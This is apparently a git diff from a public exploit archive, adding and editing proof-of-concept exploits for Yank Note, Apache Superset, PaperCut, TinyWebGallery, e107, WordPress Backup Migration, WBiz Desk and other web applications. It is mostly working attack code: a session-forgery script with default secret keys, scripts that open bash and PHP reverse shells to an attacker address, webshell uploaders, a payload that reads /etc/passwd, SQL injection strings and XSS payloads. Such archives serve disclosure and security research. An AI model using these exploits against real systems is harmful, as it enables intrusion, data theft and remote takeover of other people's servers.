+Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement
+
+Technical Details & Description:
+
+A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.
+
+Proof of Concept (PoC):
+Arbitrary code execution:
+
+Create a markdown file (.md) in any text editor and write the following payload.
+Mac:
+<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">
+
+Ubuntu:
+<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">
+
+Opening the file in Yank Note will auto execute the Calculator application.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51447.py b/exploits/multiple/webapps/51447.py
new file mode 100755
index 000000000..6487a690c
--- /dev/null
+++ b/exploits/multiple/webapps/51447.py
@@ -0,0 +1,105 @@
+# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass
+# Date: 10 May 2023
+# Exploit Author: MaanVader
+# Vendor Homepage: https://superset.apache.org/
+# Version: Apache Superset<= 2.0.1
+# Tested on: 2.0.0
+# CVE: CVE-2023-27524
+
+from flask_unsign import session
+import requests
+import urllib3
+import argparse
+import re
+from time import sleep
+from selenium import webdriver
+from urllib.parse import urlparse
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+SECRET_KEYS = [
+ b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1
+ b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1
+ b'thisISaSECRET_1234', # deployment template
+ b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation
+ b'TEST_NON_DEV_SECRET' # docker compose
+]
+
+def main():
+
+ parser = argparse.ArgumentParser()
+ parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
+ parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
+ args = parser.parse_args()
+
+ try:
+ u = args.url.rstrip('/') + '/login/'
+
+ headers = {
+ 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
+ }
+
+ resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
+ if resp.status_code != 200:
+ print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
+ return
+
+ session_cookie = None
+ for c in resp.cookies:
+ if c.name == 'session':
+ session_cookie = c.value
+ break
+
+ if not session_cookie:
+ print('Error: No session cookie found')
+ return
+
+ print(f'Got session cookie: {session_cookie}')
+
+ try:
+ decoded = session.decode(session_cookie)
+ print(f'Decoded session cookie: {decoded}')
+ except:
+ print('Error: Not a Flask session cookie')
+ return
+
+ match = re.search(r'"version_string": "(.*?)"', resp.text)
+ if match:
+ version = match.group(1)
+ else:
+ version = 'Unknown'
+
+ print(f'Superset Version: {version}')
+
+
+ for i, k in enumerate(SECRET_KEYS):
+ cracked = session.verify(session_cookie, k)
+ if cracked:
+ break
+
+ if not cracked:
+ print('Failed to crack session cookie')
+ return
+
+ print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')
+
+ try:
+ user_id = int(args.id)
+ except:
+ user_id = args.id
+
+ forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
+ print(f'Forged session cookie for user {user_id}: {forged_cookie}')
+ u1 = args.url.rstrip('/') + '/superset/welcome'
+
+ print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")
+
+
+
+
+ except Exception as e:
+ print(f'Unexpected error: {e}')
+
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51452.py b/exploits/multiple/webapps/51452.py
new file mode 100755
index 000000000..9960e75bc
--- /dev/null
+++ b/exploits/multiple/webapps/51452.py
@@ -0,0 +1,115 @@
+# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
+# Date: 13 May 2023
+# Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader
+# Vendor Homepage: https://www.papercut.com/
+# Version: 8.0 or later
+# Tested on: 22.0.4
+# CVE: CVE-2023-27350
+
+
+import requests
+import argparse
+
+Group_payload = {
+ "service":"direct/1/OptionsUserSync/$OptionsUserSource.$Form",
+ "sp":"S0",
+ "Form0":"$Hidden,$Hidden$0,$Hidden$1,$PropertySelection,$Hidden$2,$Hidden$3,$Hidden$4,$Hidden$5,$Hidden$6,$Hidden$7,$Hidden$8,$Hidden$9,$Hidden$10,$Hidden$11,$Hidden$12,$Hidden$13,$Hidden$14,$TextField,$TextField$0,$RadioGroup,$Submit,$Checkbox$2,primaryCardIdLength,$Checkbox$3,secondaryCardIdLength,$Checkbox$5,$Hidden$15,$Hidden$16,$Hidden$17,$Hidden$18,$Hidden$19,$Hidden$20,$Hidden$21,$PropertySelection$4,$TextField$13,$Checkbox$6,$TextField$14,$TextField$15,$TextField$16,$RadioGroup$0,$Submit$1,$PropertySelection$5,$TextField$17,$PropertySelection$6,$TextField$18,primaryCardId2Length,$PropertySelection$7,$TextField$19,secondaryCardId2Length,$Checkbox$7,$TextField$20,$Checkbox$8,$Checkbox$9,$Checkbox$10,$Submit$2,$Submit$3,$Submit$4,$Submit$5",
+ "$Hidden":"Sf278fd737ffcaed6eb3d1f67c2ba5c6d",
+ "$Hidden$0":"F",
+ "$Hidden$1":"F",
+ "$Hidden$2":"OH4sIAAAAAAAAAJWQwUrDQBCGp60VBBUp4lWRnncRPIjSg4iHwrYNpBU8xXW7JitJdp1sis2hF5_BlxBP-lw-gF50Y2Mp6MW5DTP_fP8_z2_QzBDotSqI4UaiyC0xIg1JJnGihCQDY5VOs5HrfZ2jkMOpkVeHny8bD8VeHVa6sBYYVBqVnTLYCnhuIw91iDzxuI0stNgtn3Aa8zSkvkWVhies1MTc3mhMLBwzR6c_dFrSaUWnf9LbXqV1h3aCfDFbwt7BDGr3CO3fwXKrYsK04LEq5Pg8zZPex26j87i-XQdwkn2NIeGGi0gSoZPE4Ulpnki3mpFS8N556r4eXBR1qDFoqj5P5BxoLKyejfzhoAcAYzNDOPrnZxfZoKrWt6nN8odzG6WB5aFjNk77l-YLeZfbs8sBAAA.",
+ "$Hidden$3":"F",
+ "$Hidden$4":"X",
+ "$Hidden$5":"X",
+ "$Hidden$6":"X",
+ "$Hidden$7":"X",
+ "$Hidden$8":"X",
+ "$Hidden$9":"X",
+ "$Hidden$10":"X",
+ "$Hidden$11":"X",
+ "$Hidden$12":"X",
+ "$Hidden$13":"F",
+ "$Hidden$14":"X",
+ "$Hidden$15":"F",
+ "$Hidden$16":"S",
+ "$Hidden$17":"S",
+ "$Hidden$18":"S",
+ "$Hidden$19":"S",
+ "$Hidden$20":"F",
+ "$Hidden$21":"SSTANDARD_UNIX",
+ "$PropertySelection":"3,CUSTOM",
+ "$TextField":"/usr/bin/python3",
+ "$TextField$0":"/usr/bin/python3",
+ "$RadioGroup":"0",
+ "primaryCardIdLength":"8",
+ "secondaryCardIdLength":"8",
+ "$PropertySelection$4":"0,STANDARD_UNIX",
+ "$TextField$13":"",
+ "$TextField$14":"",
+ "$TextField$15":"",
+ "$TextField$16":"",
+ "$RadioGroup$0":"0",
+ "$PropertySelection$5":"NONE",
+ "$TextField$17":"",
+ "$PropertySelection$6":"NONE",
+ "$TextField$18":"employeeNumber",
+ "primaryCardId2Length":"8",
+ "$PropertySelection$7":"NONE",
+ "$TextField$19":"",
+ "secondaryCardId2Length":"8",
+ "$TextField$20":"",
+ "$Submit$4":"Apply"
+
+}
+
+
+parser = argparse.ArgumentParser(description="Papercut RCE")
+parser.add_argument('--url',help='Url of the vunerable application example http://10.2.3.4:9191 dont need the trailing /')
+parser.add_argument('--ip',help='our rev shell ip')
+parser.add_argument('--port',help='our rev shell port')
+args = parser.parse_args()
+
+url = args.url
+ip = args.ip
+port = args.port
+
+passwd_input = f"import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\")"
+
+final_payload = {
+ "service":"direct/1/Home/$Form$0",
+ "sp":"S0",
+ "Form0":"$Hidden$0,$Hidden$1,inputUsername,inputPassword,$PropertySelection$0,$Submit$0",
+ "$Hidden$0":"true",
+ "$Hidden$1":"X",
+ "inputUsername":"help",
+ "inputPassword":passwd_input,
+ "$PropertySelection$0":"en",
+ "$Submit$0":"Log+in"
+}
+
+# create a session
+session = requests.Session()
+
+# visit the first URL to set up the session
+setup_url = url+"/app?service=page/SetupCompleted"
+response = session.get(setup_url)
+response.raise_for_status() # check for any errors
+
+# visit the second URL using the same session
+dashboard_url = url+"/app?service=page/Dashboard"
+response = session.get(dashboard_url)
+response.raise_for_status() # check for any errors
+
+# URL to change user group
+user_group_change_url = url+"/app"
+response = session.post(user_group_change_url,data=Group_payload)
+response.raise_for_status() # check for errors
+
+# URL to gain RCE
+rce_url = url+"/app"
+response = session.post(rce_url,data=final_payload)
+response.raise_for_status() # Check for any errors
+
+
+# print the response text
+print(response.text)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51480.txt b/exploits/multiple/webapps/51480.txt
new file mode 100644
index 000000000..216798d0c
--- /dev/null
+++ b/exploits/multiple/webapps/51480.txt
@@ -0,0 +1,30 @@
+# Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
+# Date: 2023-05-24
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://www.squarepiginteractive.com
+# Software Link: https://www.fusioninvoice.com/store
+# Version: 2023-1.0
+# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)
+# CVE: CVE-2023-25439
+
+Description:
+
+A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker to
+execute arbitrary web scripts or HTML.
+
+Injecting persistent javascript code inside the title and/or description while creating a task/expense/project (and
+possibly others) it will be triggered once page gets loaded.
+
+
+Steps to reproduce:
+
+- Click on "Expenses", or "Tasks" and add (or edit an existing) one,
+- Insert a payload PoC inside a field, in example in the "Phone number" (or "Description"),
+- Click on 'Save'.
+
+Visiting the website dashboard, as well as the customer or project summary page, the javascript code will be executed.
+
+
+PoC Screenshots:
+
+https://imagebin.ca/v/7FOZfztkDs3I
\ No newline at end of file
diff --git a/exploits/php/webapps/51436.py b/exploits/php/webapps/51436.py
index fbd61ba50..9773f948c 100755
--- a/exploits/php/webapps/51436.py
+++ b/exploits/php/webapps/51436.py
@@ -1,6 +1,6 @@
#!/usr/bin/python
-# Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)
+# Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE
# Google Dork: N/A
# Date: 27th of April, 2023
# Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
@@ -11,7 +11,7 @@
# Vulnerability originally discovered / published by Cakes
# Reference: https://www.exploit-db.com/exploits/47349
-# Run a local listener on your machine and youre good to go
+# Run a local listener on your machine and you're good to go
import os
@@ -44,7 +44,7 @@ class Exploit:
elif response.status_code == 200:
if "Invalid username or password" in response.text:
- print(f"Invalid username or password")
+ print(f"[-] Invalid username or password")
return False
return True
@@ -74,7 +74,7 @@ class Exploit:
print(f"[+] Zipped payload to {self.payload_filename}.zip")
return True
except:
- print(f"[-] Could not create payload to {self.payload_filename}.zip")
+ print(f"[-] Could not zip payload to {self.payload_filename}.zip")
return False
def upload_payload(self) -> bool:
@@ -142,7 +142,7 @@ class Exploit:
if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
print("[+] Unzipping payload successful")
- print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
+ print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
return True
else:
@@ -150,7 +150,7 @@ class Exploit:
return False
def execute_payload(self) -> bool:
- print("[*] Trying the get a reverse shell")
+ print("[*] Trying to get a reverse shell")
cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
print("[*] Executing payload")
diff --git a/exploits/php/webapps/51443.txt b/exploits/php/webapps/51443.txt
new file mode 100644
index 000000000..8d01794dd
--- /dev/null
+++ b/exploits/php/webapps/51443.txt
@@ -0,0 +1,124 @@
+#Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE)
+#Application: TinyWebGallery
+#Version: v2.5
+#Bugs: RCE
+#Technology: PHP
+#Vendor URL: http://www.tinywebgallery.com/
+#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
+#Date of found: 07-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. Go to upload image http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
+2. upload .phar file
+payload: payload: <?php echo system("cat /etc/passwd"); ?>
+3. go to file link
+
+
+poc request:
+
+
+POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
+Host: localhost
+Content-Length: 2123
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
+Connection: close
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="token"
+
+b2ed5512107a625ef9d5688ced296c61
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+2097152
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="confirm"
+
+true
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
+Content-Type: application/octet-stream
+
+<?php echo system("cat /etc/passwd"); ?>
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="twgsize"
+
+100000
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="twgquality"
+
+80
+------WebKitFormBoundary53rZRhJinqaMm7Ip--
+
+
+
+
+
+http://localhost/twg25/pictures/shell.phar
\ No newline at end of file
diff --git a/exploits/php/webapps/51445.txt b/exploits/php/webapps/51445.txt
new file mode 100644
index 000000000..f483cf49c
--- /dev/null
+++ b/exploits/php/webapps/51445.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
+# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
+# Date: 2023-05-10
+# Exploit Author: Wadeek
+# Vendor Homepage: https://backupbliss.com/
+# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
+# Version: 1.2.8
+# Tested on: WordPress 6.2
+
+1) Get the version of the plugin.
+
+=> GET /wp-content/plugins/backup-backup/readme.txt
+--------------------------------------------------------------------------
+Stable tag: 1.2.8
+--------------------------------------------------------------------------
+
+2) Get the name of the backup directory.
+
+=> GET /wp-content/backup-migration/config.json
+--------------------------------------------------------------------------
+{
+[...],
+"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
+[...],
+"OTHER:EMAIL":"admin@email.com"
+}
+--------------------------------------------------------------------------
+
+3) Get the name of the archive containing the backups.
+
+=> GET /wp-content/backup-migration/complete_logs.log
+--------------------------------------------------------------------------
+BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
+--------------------------------------------------------------------------
+
+4) Build the path for the download.
+
+=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/51449.txt b/exploits/php/webapps/51449.txt
new file mode 100644
index 000000000..a3997fc77
--- /dev/null
+++ b/exploits/php/webapps/51449.txt
@@ -0,0 +1,150 @@
+# Exploit Title: e107 v2.3.2 - Reflected XSS
+# Date: 11/05/2022
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: hub.woj12345@gmail.com
+# Vendor Homepage: https://e107.org/
+# Software Link: https://e107.org/download
+# Version: 2.3.2
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### XSS Reflected - unauthorized
+
+URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
+Parameters: content
+
+# POC
+Request:
+POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 1126
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+Accept: text/html, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+sec-ch-ua-platform: "Windows"
+Origin: http://127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml
+
+Response:
+HTTP/1.1 200 OK
+Date: Thu, 11 May 2023 19:38:45 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: PHP/7.4.29
+Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 1053
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb
+
+### XSS Reflected - Authorized
+
+URL: http://127.0.0.1/e107/e107_admin/image.php
+Parameters: for
+
+# POC 1
+Request:
+GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
+Host: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Connection: close
+
+Response:
+HTTP/1.1 200 OK
+Date: Thu, 04 May 2023 03:07:35 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: e107
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+ETag: "37f107dbe6a998ecf7b71689627c2a56"
+Content-Length: 12420
+Vary: Accept-Encoding
+X-Frame-Options: SAMEORIGIN
+Connection: close
+Content-Type: text/html; charset=utf-8
+
+<!doctype html>
+<html lang="en">
+<head>
+<title>Media Manager - Admin Area :: hacked">bbbbb</title>
+<meta charset='utf-8' />
+<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
+<!-- *CSS* -->
+[...]
+<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
+ <p>No HTML5 support.</p>
+ </div>
+[...]
+
+# POC 2
+
+URL: http://127.0.0.1/e107/e107_admin/newspost.php
+Parameters: Payload in URL
+
+Request:
+GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
+Host: 127.0.0.1
+Cache-Control: max-age=0
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
+Connection: close
+
+Response:
+
+
+
+
+HTTP/1.1 200 OK
+Date: Fri, 05 May 2023 06:21:53 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: e107
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+ETag: "d127dd6a44a22e093fed60b83bf36af2"
+Content-Length: 72914
+Vary: Accept-Encoding
+X-Frame-Options: SAMEORIGIN
+Connection: close
+Content-Type: text/html; charset=utf-8
+
+<!doctype html>
+<html lang="en">
+<head>
+<title>News - List - Admin Area :: hacked">bbbbb</title>
+<meta charset='utf-8' />
+<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
+<!-- *CSS* -->
+[...]
+<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
+<script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
+[...]
\ No newline at end of file
diff --git a/exploits/php/webapps/51450.php b/exploits/php/webapps/51450.php
new file mode 100644
index 000000000..a6309f5e5
--- /dev/null
+++ b/exploits/php/webapps/51450.php
@@ -0,0 +1,84 @@
+<?php
+/*
+Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
+Date: 12/05/2023
+Exploit Author: Chokri Hammedi
+Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
+Software Link: https://github.com/thrsrossi/Millhouse-Project.git
+Version: 1.414
+Tested on: Debian
+CVE: N/A
+*/
+
+
+$options = getopt('u:c:');
+
+if(!isset($options['u'], $options['c']))
+die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
+\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
+\033[0m\n
+\n");
+
+$target = $options['u'];
+
+$command = $options['c'];
+
+$url = $target . '/includes/add_post_sql.php';
+
+
+$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="title"
+
+helloworld
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="description"
+
+<p>sdsdsds</p>
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="category"
+
+1
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="image"; filename="rose.php"
+Content-Type: application/x-php
+
+<?php
+$shell = shell_exec("' . $command . '");
+echo $shell;
+?>
+
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
+';
+
+$headers = array(
+ 'Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
+ 'Cookie: PHPSESSID=rose1337',
+);
+
+$ch = curl_init($url);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($ch, CURLOPT_HEADER, true);
+
+$response = curl_exec($ch);
+curl_close($ch);
+
+// execute command
+
+$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
+$ch = curl_init($shell);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+$exec_shell = curl_exec($ch);
+curl_close($ch);
+echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
+
+?>
\ No newline at end of file
diff --git a/exploits/php/webapps/51451.txt b/exploits/php/webapps/51451.txt
new file mode 100644
index 000000000..e8f7ef9c0
--- /dev/null
+++ b/exploits/php/webapps/51451.txt
@@ -0,0 +1,28 @@
+[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
+[#] Exploit Date: May 12, 2023.
+[#] CVSS 3.1: 6.4 (Medium)
+[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+[#] Tactic: Initial Access (TA0001)
+[#] Technique: Exploit Public-Facing Application (T1190)
+[#] Application Name: WBiz Desk
+[#] Application Version: 1.2
+[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system
+
+
+[#] Author: h4ck3r - Faisal Albuloushi
+[#] Contact: SQL@hotmail.co.uk
+[#] Blog: https://www.0wl.tech
+
+
+[#] 3xploit:
+
+[path]//ticket.php?tk=[SQL Injection]
+
+
+[#] 3xample:
+
+[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -
+
+
+[#] Notes:
+- The vulnerability requires a non-admin privilege (normal) user to be exploited.
\ No newline at end of file
diff --git a/exploits/php/webapps/51454.txt b/exploits/php/webapps/51454.txt
new file mode 100644
index 000000000..24ad691b7
--- /dev/null
+++ b/exploits/php/webapps/51454.txt
@@ -0,0 +1,184 @@
+#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
+#Application: PodcastGenerator
+#Version: v3.2.9
+#Bugs: Stored Xss
+#Technology: PHP
+#Vendor URL: https://podcastgenerator.net/
+#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
+#Date of found: 14-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+
+#########XSS -1##############
+
+1.go to 'Episodes' then 'Upload New Episodes'(http://localhost/PodcastGenerator/admin/episodes_upload.php)
+2.set title section as <img src=1 onerror=alert("XSS-1")>
+3.And go to 'View All Episoded'(http://localhost/PodcastGenerator/admin/episodes_list.php)
+
+payload: <img src=1 onerror=alert("XSS-1")>
+
+poc- request:
+
+POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
+Host: localhost
+Content-Length: 8307
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
